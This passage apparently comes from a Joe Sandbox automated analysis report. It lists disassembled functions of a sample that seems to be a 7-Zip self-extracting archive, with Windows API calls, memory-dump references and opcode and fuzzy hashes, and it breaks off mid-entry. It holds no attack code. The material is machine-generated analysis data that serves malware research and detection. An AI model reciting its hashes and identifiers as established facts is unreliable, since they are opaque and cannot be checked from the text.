                                                                                                                                                                      • Instruction Fuzzy Hash: E311C172A00219AFDB208F68DD44AABB7B8EF48704F01427EAC45B7380DF719D05CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004182F4
                                                                                                                                                                        • Part of subcall function 00418241: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00418270
                                                                                                                                                                        • Part of subcall function 00418241: ___AdjustPointer.LIBCMT ref: 0041828B
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00418309
                                                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0041831A
                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00418342
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                      • Opcode ID: 110da7d1c6ce5bea61a2aec282f92c69db10d6b3118e185abc890ba49dcb9387
                                                                                                                                                                      • Instruction ID: e15a677e1f73e86b5f42ab0e3da03cd1d24b6e3a9b32c8766febede5e188ef9f
                                                                                                                                                                      • Opcode Fuzzy Hash: 110da7d1c6ce5bea61a2aec282f92c69db10d6b3118e185abc890ba49dcb9387
                                                                                                                                                                      • Instruction Fuzzy Hash: AE01ED32500109BBDF126F96CC45EEB7F69EF58758F08401DFE1866121DB3AE8A1DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0040A07C
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040A08E
                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 0040A09D
                                                                                                                                                                        • Part of subcall function 00408451: KillTimer.USER32(?,00000001), ref: 0040845F
                                                                                                                                                                      • CallNextHookEx.USER32(?,?,?), ref: 0040A0BF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3015594791-0
                                                                                                                                                                      • Opcode ID: b245893613bd07ebfd0fdf9842ef43e7ea724dac6e4a133ab68209a176e0fb33
                                                                                                                                                                      • Instruction ID: c5253fab3988fd9ceeccbe1ebfe6da74f2a34928572cde87a90a9c54b3b831c3
                                                                                                                                                                      • Opcode Fuzzy Hash: b245893613bd07ebfd0fdf9842ef43e7ea724dac6e4a133ab68209a176e0fb33
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E014431200209EFCF20EF54DD54DAE7BB5FB08304B14817AE506A62B1D775E8A9DF5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 00409942
                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00409958
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040996C
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00409978
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2001801573-0
                                                                                                                                                                      • Opcode ID: aa82001d46b39d1db484f2dbcb934f8f6ccc1e52e9d3db63e5db7bf848302044
                                                                                                                                                                      • Instruction ID: bdd72d62616218614ec8ad58ebf6b86f3db3b0295b495b4d059cd2c9f8d91e95
                                                                                                                                                                      • Opcode Fuzzy Hash: aa82001d46b39d1db484f2dbcb934f8f6ccc1e52e9d3db63e5db7bf848302044
                                                                                                                                                                      • Instruction Fuzzy Hash: BDF05475A00704ABD7305BA4DD09F87BFACAF44B11F450039BD02B12D9DF74D8058A58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,00422DF9,?,00000001,?,00000001,?,00421E57,00000020,?,00000001), ref: 00423C1D
                                                                                                                                                                      • GetLastError.KERNEL32(?,00422DF9,?,00000001,?,00000001,?,00421E57,00000020,?,00000001,00000020,00000001,?,004223D6,00000008), ref: 00423C29
                                                                                                                                                                        • Part of subcall function 00423BEF: CloseHandle.KERNEL32(FFFFFFFE,00423C39,?,00422DF9,?,00000001,?,00000001,?,00421E57,00000020,?,00000001,00000020,00000001), ref: 00423BFF
                                                                                                                                                                      • ___initconout.LIBCMT ref: 00423C39
                                                                                                                                                                        • Part of subcall function 00423BB1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00423BE0,00422DDF,00000001,?,00421E57,00000020,?,00000001,00000020), ref: 00423BC4
                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,00422DF9,?,00000001,?,00000001,?,00421E57,00000020,?,00000001,00000020), ref: 00423C4E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                      • Opcode ID: c632d5a77bb0d31995ff0d84f64276103a3a88574367d43ecb90f5810a5ebf5d
                                                                                                                                                                      • Instruction ID: 00e9da8735273d3f417082ed05cc657c3cee2d2d9b3d905743c44b077b868b27
                                                                                                                                                                      • Opcode Fuzzy Hash: c632d5a77bb0d31995ff0d84f64276103a3a88574367d43ecb90f5810a5ebf5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 78F01237200269BBDF222FD6EC0499A3F76FB183A2F814165F91895131C6369920DB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(?), ref: 00404081
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00404095
                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2099118873-0
                                                                                                                                                                      • Opcode ID: 91978cfe2751bc6ad27ba7775ec1b7e026b1ed69c816e5d19e369bd3a7f79805
                                                                                                                                                                      • Instruction ID: b66d6f51a09f466e3f1a895b3637ce6df07ce734d9cfad825eab1b3b0eb75e52
                                                                                                                                                                      • Opcode Fuzzy Hash: 91978cfe2751bc6ad27ba7775ec1b7e026b1ed69c816e5d19e369bd3a7f79805
                                                                                                                                                                      • Instruction Fuzzy Hash: DFE04F72200249BFDB209FA2EC88C5B7FACFB897653414035FE15C1120C731D846CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0041CA39
                                                                                                                                                                        • Part of subcall function 0041D99A: HeapFree.KERNEL32(00000000,00000000,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?), ref: 0041D9B0
                                                                                                                                                                        • Part of subcall function 0041D99A: GetLastError.KERNEL32(?,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?,?), ref: 0041D9C2
                                                                                                                                                                      • _free.LIBCMT ref: 0041CA4C
                                                                                                                                                                      • _free.LIBCMT ref: 0041CA5D
                                                                                                                                                                      • _free.LIBCMT ref: 0041CA6E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                                                                                                                                      • Instruction ID: 3eaef5f428d09324b14265b15cb39ead9da290f6326002ff294f85c2eb1d1b52
                                                                                                                                                                      • Opcode Fuzzy Hash: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0B6F2860220BA8B0A7F26BC4158A3EE1F758717305742BF45916639C73D07D2AF9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00407F68: GetSystemMetrics.USER32(0000000B), ref: 00407F92
                                                                                                                                                                        • Part of subcall function 00407F68: GetSystemMetrics.USER32(0000000C), ref: 00407F99
                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00408092
                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 004080A3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                      • String ID: 100%%
                                                                                                                                                                      • API String ID: 4116985748-568723177
                                                                                                                                                                      • Opcode ID: 5956e89d91539bf1be7e0d599d6fddc0c2750888a7e0b8bfd265b9a2f70e1c9a
                                                                                                                                                                      • Instruction ID: 8487e24fe88bb973aa5c0e0d2e46d373bfe847caa0c3536acd560b69327afa84
                                                                                                                                                                      • Opcode Fuzzy Hash: 5956e89d91539bf1be7e0d599d6fddc0c2750888a7e0b8bfd265b9a2f70e1c9a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F315C716007059FCB20EB69DA429AFBBF5EF50718F00052EE482B66D1DB74ED49CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: `3C$l3C
                                                                                                                                                                      • API String ID: 0-4265917238
                                                                                                                                                                      • Opcode ID: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                                                                                                                                      • Instruction ID: 5519793aae1b5ad110ba9f4c4c1520e0ccee9841e529c941c8b1b40779b6c268
                                                                                                                                                                      • Opcode Fuzzy Hash: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                                                                                                                                      • Instruction Fuzzy Hash: CB11E031E046146ADF00DF7CA8513DF77A46F06324F14906BEC10EB281D778AE808B9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Itemwsprintf
                                                                                                                                                                      • String ID: (%d%s)
                                                                                                                                                                      • API String ID: 449186261-2087557067
                                                                                                                                                                      • Opcode ID: d2e2167c4bf2b07b02facf3a4b02caecadafc7d69f0aed4da4d943e4089f457b
                                                                                                                                                                      • Instruction ID: 8c9b87f95cd86d3227a749791a2567e5c62fe874d7b8c78f0c607d31453c10d6
                                                                                                                                                                      • Opcode Fuzzy Hash: d2e2167c4bf2b07b02facf3a4b02caecadafc7d69f0aed4da4d943e4089f457b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF04972900218AFCF10B795DC06E8E77BDEF44308F40446AF613A1462DB75AA598B58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00407D35: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407D70
                                                                                                                                                                        • Part of subcall function 00407D35: GetSystemMetrics.USER32(00000011), ref: 00407D82
                                                                                                                                                                      • IsWindow.USER32 ref: 00409F9D
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000078), ref: 00409FAF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallbackDispatcherMetricsReadSystemUserWindow
                                                                                                                                                                      • String ID: 8~B
                                                                                                                                                                      • API String ID: 388239213-4233566718
                                                                                                                                                                      • Opcode ID: d78989d57116a90b7011ee10293bbf73217535a3b432fe44aafeec329668e175
                                                                                                                                                                      • Instruction ID: 5f531cd96944466510315b262270dfa2334589700289989bc5a66cfbbad84b2e
                                                                                                                                                                      • Opcode Fuzzy Hash: d78989d57116a90b7011ee10293bbf73217535a3b432fe44aafeec329668e175
                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0B431744126ABCF10AFE1ED16AA97B35BF00745F004539FA01A52F6EBB49814CB9C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00407D35: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407D70
                                                                                                                                                                        • Part of subcall function 00407D35: GetSystemMetrics.USER32(00000011), ref: 00407D82
                                                                                                                                                                      • IsWindow.USER32 ref: 00409F36
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000078), ref: 00409F48
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallbackDispatcherMetricsReadSystemUserWindow
                                                                                                                                                                      • String ID: h~B
                                                                                                                                                                      • API String ID: 388239213-2431334222
                                                                                                                                                                      • Opcode ID: ddef8c3f623dfc1824cd857c2a11baad28c4866ac9ade75396bb3ca9b8d085f0
                                                                                                                                                                      • Instruction ID: 04d4bf12f879747efbc59a4bd3e20fa98de391c54e7ef9d5966c802a0e9cf1a5
                                                                                                                                                                      • Opcode Fuzzy Hash: ddef8c3f623dfc1824cd857c2a11baad28c4866ac9ade75396bb3ca9b8d085f0
                                                                                                                                                                      • Instruction Fuzzy Hash: B6F0F030A041469FDB10AFF0EC56BA97B36BF10309F00403AE604A42F7DBB85858CB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040860B: IsWindow.USER32(00000000), ref: 00408614
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00409FEF,x}B,00000000,00000000), ref: 00409DC1
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 00409DEA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateItemThreadWindow
                                                                                                                                                                      • String ID: x}B
                                                                                                                                                                      • API String ID: 1005160481-2816526333
                                                                                                                                                                      • Opcode ID: eff7c2a864bc86e5ecd01cb7d6264d82e99845e945669ad75a2d525992a51df6
                                                                                                                                                                      • Instruction ID: acecdef57773b65823629684274dc576dd825be92ea59fe7f9c59be1782db0e4
                                                                                                                                                                      • Opcode Fuzzy Hash: eff7c2a864bc86e5ecd01cb7d6264d82e99845e945669ad75a2d525992a51df6
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E092B53012207BE9202361BD0ADAB3A4DDB54720701443AB806E11D2CEB98C4055AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DialogWindow
                                                                                                                                                                      • String ID: ExecuteOnLoad
                                                                                                                                                                      • API String ID: 2634769047-2703198497
                                                                                                                                                                      • Opcode ID: 44f1ecb655085ac98aaf98d0f83e04e27aee08ef5a8ac3c51c9222f6e074e9ce
                                                                                                                                                                      • Instruction ID: f0e771cb58d168debaee2b7409eb9b93e0bd3ccf793fddb14a53480844e180ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 44f1ecb655085ac98aaf98d0f83e04e27aee08ef5a8ac3c51c9222f6e074e9ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BC08C30300211EBDB302B18FF0AB827BA8EF00B10F46447EB846A00B0CBE0AC118A98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 004067CC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                                                      • API String ID: 2030045667-3806377612
                                                                                                                                                                      • Opcode ID: c62dd35eb1956b63952f305c9ec45312e0d1a565043a86658dcb457737846c61
                                                                                                                                                                      • Instruction ID: b232b5b51c1f87b34ab939d925b3bc23547785b2bcce08a05be46e7ce2a63e52
                                                                                                                                                                      • Opcode Fuzzy Hash: c62dd35eb1956b63952f305c9ec45312e0d1a565043a86658dcb457737846c61
                                                                                                                                                                      • Instruction Fuzzy Hash: 18B012703C831431D11083602C07F0914400B58F22FD104517901A80C0D6D45140101C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                      • String ID: x%^
                                                                                                                                                                      • API String ID: 3253501508-3246607598
                                                                                                                                                                      • Opcode ID: 9c5c336ed9f01159b359a7e71459e17f731cec5e66911555df6e4c34a555c4e4
                                                                                                                                                                      • Instruction ID: d13d55763d65b34ac5e490d59691d861136ac0158d0773816bec6458a8860842
